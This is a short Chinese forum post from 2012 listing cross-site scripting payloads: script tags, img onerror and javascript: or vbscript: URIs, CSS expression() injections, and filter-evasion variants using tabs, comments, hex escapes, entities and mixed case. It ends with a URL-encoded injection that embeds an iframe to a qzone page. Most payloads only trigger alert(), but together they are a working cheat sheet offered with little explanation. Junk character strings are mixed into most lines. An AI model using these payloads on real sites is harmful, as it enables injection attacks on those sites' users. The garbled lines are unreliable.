<script>alert("跨站")</script> (最常用)5 L: Q' e8 O' s7 r
<img scr=javascript:alert("跨站")></img>3 W! h: } N% f
<img scr="javascript: alert(/跨站/)></img>( |% ]8 [/ C! V: l1 n8 R" D
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)$ k4 [+ [7 f9 g' s' @
<img scr="#" onerror=alert(/跨站/)></img>3 u; G, |1 f, s9 X7 z- O* S6 x
<img scr="#" style="xss:expression(alert(/xss/));"></img>0 l) D3 l0 S- o
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)) c5 `3 e( l! i% v' Z! k6 n8 K
<img src=vbscript:msgbox ("xss")></img>2 R( y0 N4 X9 X. S8 H
<style> input {left:expression (alert('xss'))}</style>
0 P; Y# o" ?0 k; V. s! ^! `<div style={left:expression (alert('xss'))}></div>
7 w9 t! \# G+ W4 m4 }- H<div style={left:exp/* */ression (alert('xss'))}></div>4 ^5 v5 [" O$ n7 d* a; ?: A, o
<div style={left:\0065\0078ression (alert('xss'))}></div>
7 `/ C! w5 K' H1 n" Z( khtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
- g& Y+ ~3 e5 _; L& J2 y6 \. Nunicode <div style="{left:expRessioN (alert('xss'))}">* R7 ~8 D# r0 S& z
1 A$ B( {! V% ~, a& M
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["3 `+ b$ s: |7 X
|
发表于 2012-9-13 17:15:04
收藏
支持
反对